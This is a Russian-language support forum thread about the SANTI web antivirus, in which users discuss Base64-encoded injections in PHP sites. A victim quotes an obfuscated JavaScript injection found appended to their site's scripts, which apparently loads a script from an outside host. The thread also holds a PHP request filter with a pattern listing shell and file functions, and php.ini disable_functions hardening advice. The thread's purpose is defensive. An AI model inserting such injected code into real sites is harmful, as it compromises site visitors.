Тема: Вопросы по вредоносным вставкам и BASE64
а работает ли антивирус с Base64 Decode?
тобиш я его удаляю из php скрипта,а он всё равно появляется и в итоге выставляет ссылку на ресурс
может ли он бороться с таким явлением?
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Уважаемые пользователи САНТИ, по многочисленным просьбам мы вводим услугу платного лечения и сопровождения сайтов от Санти. Подробности. Консультации и устанавка Санти по прежнему БЕСПЛАТНЫ! Спасибо друзья!
В случае возникновения проблем с регистрацией на форуме, вопросы можно адресовать на почту - info@santivi.com
Форум сообщества и поддержки web-антивируса САНТИ → САНТИ: Общие вопросы по работе с системой → Вопросы по вредоносным вставкам и BASE64
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
а работает ли антивирус с Base64 Decode?
тобиш я его удаляю из php скрипта,а он всё равно появляется и в итоге выставляет ссылку на ресурс
может ли он бороться с таким явлением?
а работает ли антивирус с Base64 Decode?
тобиш я его удаляю из php скрипта,а он всё равно появляется и в итоге выставляет ссылку на ресурс
может ли он бороться с таким явлением?
Он может как минимум сообщать Вам что код опять появился и файл изменился, НО если у вас постоянно появляются вредоносные вставки даже после лечения, то тут надо более серьезно подходить к вопросу - либо у вас ушли доступы к файлам сайта, либо у вас стоит веб-шелл/бекдор, либо бьют через дырки в CMS - все эти варианты необходимо проверить и залечить вручную, максимум применяя утилиты САНТИ. На автомате он Вам тут не поможет, кроме как предупредит.
вопрос-пример:
Есть на выходе ненужный текст: <div (бла бла)>< a href=ссылка на чужой ресурс....(бла бла)</a></div>
ввожу начало и конец этой ереси ненужной нажимаю поиск
Вопрос: он ищет строго только этот текст или ещё вдобавок на всякий случай перекодирует и ищет данную вставку на кодировку base64 ?
Если да, то это круто, продолжайте в том же духе, если нет, то когда планируется ввести автоматизацию этого процесса в санти поиск по вставкам?
вопрос-пример:
Есть на выходе ненужный текст: <div (бла бла)>< a href=ссылка на чужой ресурс....(бла бла)</a></div>
ввожу начало и конец этой ереси ненужной нажимаю поиск
Вопрос: он ищет строго только этот текст или ещё вдобавок на всякий случай перекодирует и ищет данную вставку на кодировку base64 ?
Если да, то это круто, продолжайте в том же духе, если нет, то когда планируется ввести автоматизацию этого процесса в санти поиск по вставкам?
Сегодня перекодировки не происходит, происходит поиск исключительно строки начинающейся и заканчивающейся на то, что вы задали. В последующем будет использоваться поиск вредоносов на основе ClamAV антивируса, там будет происходить раскодировка при поиске вредоносов. Срок релиза пока озвучивать не будем.
Спасибо.
Привет всем ! ребят помогите, третий раз умудряются пропатчить все js скрипты, в конец кода добавляется непонятно чем убфусцированная вставка вида:
-----------------------------------------------------
var I=/*@cc_on!@*/false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();}
--------------------------------------------------------------------
Пароли менялись не однократно, видимо уязвимость CMS, сайт гибридный, за основу брали янку, потом уже правили под нужы клиента, сайт делался под заказ и найти разработчиков не представляется возможным.
Заблокировал админку движка по IP через htaccess, отключил SSH, FTP до востребования, установил Санти, настроил, ввел фильтрацию запросов:
--------------------------------------------------------------------
<?php
$patt = "~\<\?~i";
if (is_array($_FILES)) {
foreach($_FILES as $anystring=>$file_data) {
if (preg_match($patt,file_get_contents($file_data['tmp_name']))) die("denied by antivirus-alarm 3");
}
}
$patt = "~\/\.\.\/\.\.\/\.\.\/|{0-9a-zA-Z}[80]|eval[^\(]*\(|include[^\(]*\(|base64_decode[^\(]*\(|stripslashes[^\(]*\(|strip_tags[^\(]*\(|fopen[^\(]*\(|chmod[^\(]*\(|chown[^\(]*\(|chgrp[^\(]*\(|unlink[^\(]*\(|unset[^\(]*\(|fgetc[^\(]*\(|fgets[^\(]*\(|file_get_contents[^\(]*\(|file_put_contents[^\(]*\(|fwrite[^\(]*\(|move_uploaded_file[^\(]*\(|is_uploaded_file[^\(]*\(|rmdir[^\(]*\(|fromCharCode[^\(]*\(|tmpfile[^\(]*\(|tempnam[^\(]*\(|phpinfo[^\(]*\(|basename[^\(]*\(|curl_init[^\(]*\(|socket_create[^\(]*\(|popen[^\(]*\(|exec[^\(]*\(|system[^\(]*\(|passthru[^\(]*\(|proc_open[^\(]*\(|gzuncompress[^\(]*\(|shell_exec[^\(]*\(|delete from|insert into~i";
foreach ($_REQUEST as $v1x1) prfilter_x1($v1x1,$patt);
function prfilter_x1($v1x1,$patt) {
ob_start();
if (is_array($v1x1)) {
foreach ($v1x1 as $vx) prfilter_x1($vx,$patt);
}
else {
if ( preg_match($patt, $v1x1) || preg_match($patt, stripslashes($v1x1) ) ) die("denied by antivirus-alarm 1");
if ( preg_match($patt, base64_decode($v1x1) ) || preg_match($patt, stripslashes(base64_decode($v1x1) ) ) ) die("denied by antivirus-alarm 2");
}
ob_end_clean();
}
?>
-------------------------------------------------------------------------
Может быть есть еще какие нибудь рекомендации по предотвращению этого беспредела ? Начальство бушует, не хочется терять работу.
Привет всем ! ребят помогите, третий раз умудряются пропатчить все js скрипты, в конец кода добавляется непонятно чем убфусцированная вставка вида:
-----------------------------------------------------
var I=/*@cc_on!@*/false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();}--------------------------------------------------------------------
Пароли менялись не однократно, видимо уязвимость CMS, сайт гибридный, за основу брали янку, потом уже правили под нужы клиента, сайт делался под заказ и найти разработчиков не представляется возможным.
Заблокировал админку движка по IP через htaccess, отключил SSH, FTP до востребования, установил Санти, настроил, ввел фильтрацию запросов:--------------------------------------------------------------------
<?php$patt = "~\<\?~i";
if (is_array($_FILES)) {
foreach($_FILES as $anystring=>$file_data) {
if (preg_match($patt,file_get_contents($file_data['tmp_name']))) die("denied by antivirus-alarm 3");
}
}$patt = "~\/\.\.\/\.\.\/\.\.\/|{0-9a-zA-Z}[80]|eval[^\(]*\(|include[^\(]*\(|base64_decode[^\(]*\(|stripslashes[^\(]*\(|strip_tags[^\(]*\(|fopen[^\(]*\(|chmod[^\(]*\(|chown[^\(]*\(|chgrp[^\(]*\(|unlink[^\(]*\(|unset[^\(]*\(|fgetc[^\(]*\(|fgets[^\(]*\(|file_get_contents[^\(]*\(|file_put_contents[^\(]*\(|fwrite[^\(]*\(|move_uploaded_file[^\(]*\(|is_uploaded_file[^\(]*\(|rmdir[^\(]*\(|fromCharCode[^\(]*\(|tmpfile[^\(]*\(|tempnam[^\(]*\(|phpinfo[^\(]*\(|basename[^\(]*\(|curl_init[^\(]*\(|socket_create[^\(]*\(|popen[^\(]*\(|exec[^\(]*\(|system[^\(]*\(|passthru[^\(]*\(|proc_open[^\(]*\(|gzuncompress[^\(]*\(|shell_exec[^\(]*\(|delete from|insert into~i";
foreach ($_REQUEST as $v1x1) prfilter_x1($v1x1,$patt);
function prfilter_x1($v1x1,$patt) {
ob_start();
if (is_array($v1x1)) {
foreach ($v1x1 as $vx) prfilter_x1($vx,$patt);
}
else {if ( preg_match($patt, $v1x1) || preg_match($patt, stripslashes($v1x1) ) ) die("denied by antivirus-alarm 1");
if ( preg_match($patt, base64_decode($v1x1) ) || preg_match($patt, stripslashes(base64_decode($v1x1) ) ) ) die("denied by antivirus-alarm 2");}
ob_end_clean();
}
?>
-------------------------------------------------------------------------
Может быть есть еще какие нибудь рекомендации по предотвращению этого беспредела ? Начальство бушует, не хочется терять работу.
Добрый день. Если код сайта огромен и его проверку на предмет уязвимостей и исправление нет возможности/желания делать, то естественно взломы будут продолжаться. Мой совет - отключите тогда хотя бы функции PHP, которые помогают вредителям работать с файлами, консолью и т.д.. Отключение производится с администраторами хостинга, либо самостоятельно - если есть доступ к php.ini. В нем надо прописать строки вида:
allow_url_fopen = Off
allow_url_include = Off
expose_php = Off
magic_quotes_gpc = On
register_globals = Off
memory_limit = 1011M
disable_functions = popen,exec,system,passthru,proc_open,shell_exec,ini_restore,dl,symlink,chgrp,putenv,getmyuid,posix_setuid,posix_setsid,posix_setpgid,posix_kill,apache_child_terminate,chmod,pcntl_exec,phpinfo,virtual,proc_close,proc_get_status,proc_terminate,proc_nice,getmygid,proc_getstatus,proc_close,escapeshellarg,show_source,pclose,safe_dir,dl,ini_restore,chown,chgrp,shown_source,mysql_list_dbs,get_current_user,getmyid,leak,pfsockopen,get_current_user,syslog
Тогда я пожалуй просто перенесу этот сайт на один из серверов этой же организации и поменяю DNS. Спасибо за параметры php.ini
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Форум сообщества и поддержки web-антивируса САНТИ → САНТИ: Общие вопросы по работе с системой → Вопросы по вредоносным вставкам и BASE64